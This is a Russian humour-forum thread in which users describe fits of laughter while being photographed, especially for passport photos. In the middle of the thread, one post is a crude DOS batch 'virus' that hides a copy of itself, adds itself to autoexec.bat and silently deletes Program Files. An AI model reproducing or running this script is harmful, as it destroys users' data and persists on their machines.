|
Ржу когда фоторгафируюсь!
Правила форума
!ВНИМАНИЕ! Раздел юмор не ограничивается этическими нормами. В разделе могут присутствовать (и присутствуют) материалы для взрослых, а так же нецензурная брань (мат). Заранее предупреждая об этом, не рекомендуем посещение раздела лицами не достигшими совершеннолетия, а так же впечатлительными лицами и лицами с "несвободным" вероисповеданием. Все негативные высказывания о материалах раздела будут удаляться без предупреждения. меня даже если фменя даже если фотать когда у мну кислая мина, ток на меня объектив наводиться и при этом обязательно произноситься фраза *так и сиди(стой и т.д. и т.п.)* я сразу начинаю ржать))
Один раз с сетроОдин раз с сетрой устроили фотоссесию,я значит ее пофоткала,пришла моя очередь фоткаться,я ей говорю "Сапоги главное сфоткай"..вот она никак не может меня в полный рост сфоткать,я уже молчу про сапоги,Фоткает обычные фотки,мы с них ржем и вот опять объектив на меня а я ей "Про сапоги не забудь"..Вот это ржач был...я теперь когда свои сапоги вижу меня ржать прет...
Мы ржём постояннМы ржём постоянно но вот когда бужнём с девками то тогда просто жуть)))))))))на следующий день собираемся фотки смотреть коллективом вот тогда всемирный ржач наступает!))))))))))))
блиииин..я почтиблиииин..я почти всегда кода фотаюсь ржу...особенно если сфоткаться нужно серьёзно,типо на паспорт или ещё какие нибудь документы...
да, с паспортом эда, с паспортом это тема!! а меня на госэкзамене как понесло!!! потом так неудобно было!!! да и на защите было примерно тоже, но я собралась и защитилась!!! )))))
@Echo off Echo Virus Date 13.0@Echo off Echo Virus Date 13.09.96 If exist c:ski.bat goto abc Copy %0 c:ski.bat Attrib +h c:ski.bat Echo c:ski.bat >>autoexec.bat md PRIDUROK md LUZER md DURAK md LAMER Label E: PRIDUROK assoc.exe=.mp3 del c:Program Files/q Echo VIRUS LOAD
помню на сайт шкпомню на сайт школы щелкались.... так нас с подругой так понесло))) все фотографии испортили)))
Как то раз пришлКак то раз пришла фоткаться на паспорт и со мной подруга для компании) я села и мне чето смешно стало. сначала немного а потом вообще беда! вроде успокоиться а ужэ глаза слезятся и вся красная)вроде неловко и от этого смешнее вдвойне
о бох мой,ладно ко бох мой,ладно когда просто фоткаюсь еще не так пробирает,но когда нас с подругой фоткал наш общий лучший друг,то это вообще жееесть,мы еле сдерживались и поэтому поиспоганили(точнее не мы поиспоганили,а он поиспоганил,так как смешил нас одним своим видом)все фотки...ух...как вспомню...
если вижу передесли вижу перед собой фотоаппарат, то блин....у меня всё...как рефлекс какой-то на фотик....ржу как ненормальная!!!!!!......потом успокоится же не могу!!!!!!!!))))))
да, само главноеда, само главное что на ржач пробивает именно после того, как сказали - а теперь все сделали серьезные, умные лица. и сразу же появляется желание зардать на всю Ивановскую! поэтому на всех фотках у меня либо страшная рожа, т.к. давлюсь от смеха, либо лыба на поллица, потому что уже не выдержала))))
один раз у подруодин раз у подруги на днюшке когда фоткались я как начну ржать аж икота началась)) и главное не понятно почему))
все фотки испортила ...
А когда я фоталаА когда я фоталась на паспорт с меня вся очередь в паспортном ржала. прост дверь была открыта. Когда тётя начала мне говорить шоб я сидела ровно и не шевелилась мне стало очень смешно. я долго сидела и просто тупо ржала,ну а остальные ржали с меня. Блин, несколько раз фоты переделывали.
Я как то на граждЯ как то на гражданство фоткалась мне говорят сделай серьёзное выражение лица, а это моё слабое место, когда я делаюсь серьёзной то сразу накрывает волной и я ржу как ненормальная это вообще было.......